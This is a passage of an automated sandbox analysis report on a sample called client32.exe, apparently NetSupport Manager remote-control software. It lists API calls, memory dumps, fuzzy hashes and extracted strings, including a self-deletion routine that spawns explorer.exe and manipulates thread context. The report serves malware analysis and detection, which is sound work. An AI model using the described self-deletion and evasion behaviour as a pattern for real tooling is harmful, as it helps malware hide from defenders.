                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                              • String ID:
                                                                              • API String ID: 1828324828-0
                                                                              • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                              • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                              • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                              • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                              Function 11145A70 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                              • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                              • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                              • String ID:
                                                                              • API String ID: 3768737497-0
                                                                              • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                              • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                              • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                              • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                              Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LockitLockit::_std::_
                                                                              • String ID:
                                                                              • API String ID: 3382485803-0
                                                                              • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                              • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                              • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                              • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                              Function 11143BD0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,75BF8400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: QueryValue
                                                                              • String ID:
                                                                              • API String ID: 3660427363-0
                                                                              • Opcode ID: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                              • Instruction ID: ee220ac459adc96ef86e18eb3808082b68f6554a37139a9005b103db31ef1b78
                                                                              • Opcode Fuzzy Hash: 91328a05fa49adc7f96a877065892eb549607f162fa4bf6631575699f60be126
                                                                              • Instruction Fuzzy Hash: 2611B97171C2795FEB15CE46D690AAEFB6AEBC5F14F30816BE51947D00C332A482C754
                                                                              Function 110FB470 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FB49D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InformationToken
                                                                              • String ID:
                                                                              • API String ID: 4114910276-0
                                                                              • Opcode ID: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                              • Instruction ID: 0dd0dc8a76de1486b7c0157bd4876b78410922a839ecfb631160e4ccf4e8658d
                                                                              • Opcode Fuzzy Hash: 2187bc4dd0207f2c4cff668421eac79af3382fb4f4e0b6f0c948954ee106bd6b
                                                                              • Instruction Fuzzy Hash: E1118671A0055D9BDB11CFA8DD51BEEB3E8DB48309F0041D9E9499B340EA70AE488B90
                                                                              Function 11170FC4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 328603210-0
                                                                              • Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                              • Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
                                                                              • Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                              • Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
                                                                              Function 111681A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __waccess_s
                                                                              • String ID:
                                                                              • API String ID: 4272103461-0
                                                                              • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                              • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                              • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                              • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                              Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __fsopen
                                                                              • String ID:
                                                                              • API String ID: 3646066109-0
                                                                              • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                              • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                              • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                              • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585
                                                                              Function 00951000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _NSMClient32@8.PCICL32(?,?,?,009510A2,00000000), ref: 0095100B
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2968364486.0000000000951000.00000020.00000001.01000000.00000006.sdmp, Offset: 00950000, based on PE: true
                                                                              • Associated: 00000003.00000002.2968285369.0000000000950000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2968386737.0000000000952000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_950000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Client32@8
                                                                              • String ID:
                                                                              • API String ID: 433899448-0
                                                                              • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                              • Instruction ID: ed15c69ad6172e21a5148b3926d42e55c514b86907d734defd9bb094f21f6e5b
                                                                              • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                              • Instruction Fuzzy Hash: 92B092B211434D9B8714EEA9E841E7B339CAA98600F000809BD0543282CA61FC609671

                                                                              Non-executed Functions

                                                                              Function 111273E0 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 289fileprocessthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 11127400
                                                                              • _memset.LIBCMT ref: 1112741D
                                                                              • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                              • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                              • _strrchr.LIBCMT ref: 111274AA
                                                                              • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                              • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                              • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                              • wsprintfA.USER32 ref: 11127561
                                                                              • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                              • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                              • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                              • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                              • _strrchr.LIBCMT ref: 111276AB
                                                                              • _memmove.LIBCMT ref: 11127724
                                                                              • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                              • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                              • API String ID: 2219718054-800295887
                                                                              • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                              • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                              • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                              • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
                                                                              Function 110241A0 Relevance: 49.6, APIs: 15, Strings: 13, Instructions: 553windowtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • BringWindowToTop.USER32(?), ref: 110242DC
                                                                              • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000003), ref: 110242F8
                                                                              • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102430A
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 1102432F
                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 11024361
                                                                              • GetDlgItem.USER32(00000000,00000002), ref: 1102439C
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 110243A5
                                                                              • GetMenu.USER32(?), ref: 11024433
                                                                              • DeleteMenu.USER32(?,00000001,00000400), ref: 1102445B
                                                                              • DrawMenuBar.USER32(?), ref: 1102457C
                                                                              • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000005), ref: 110245D7
                                                                              • UpdateWindow.USER32(00000000), ref: 11024622
                                                                              • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 11024633
                                                                              • KillTimer.USER32(00000000,?), ref: 1102466C
                                                                                • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                              • IsIconic.USER32(?), ref: 110245E1
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Menu$ExitLongProcessTimer$BringDeleteDrawEnableErrorIconicItemKillLastMessageUpdate_strrchrwsprintf
                                                                              • String ID: ..\CTL32\chatexw.cpp$ChatEx$Client$DisableChatSave$DisableJournal$DisableStudentJournal$DisableTutorJournal$RDH:: destroy dialog %x$RDH::Start ChatThread - object %x$RDH::Stop Chat Thread$e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 1796703375-4211839426
                                                                              • Opcode ID: 78929beebf795930fb9caa717a847736006fca00c9768058545c91b3f72f0481
                                                                              • Instruction ID: c53e1d1d26cb22908c254caa008bdb6232af04d82666ed9524dbf79592a97066
                                                                              • Opcode Fuzzy Hash: 78929beebf795930fb9caa717a847736006fca00c9768058545c91b3f72f0481
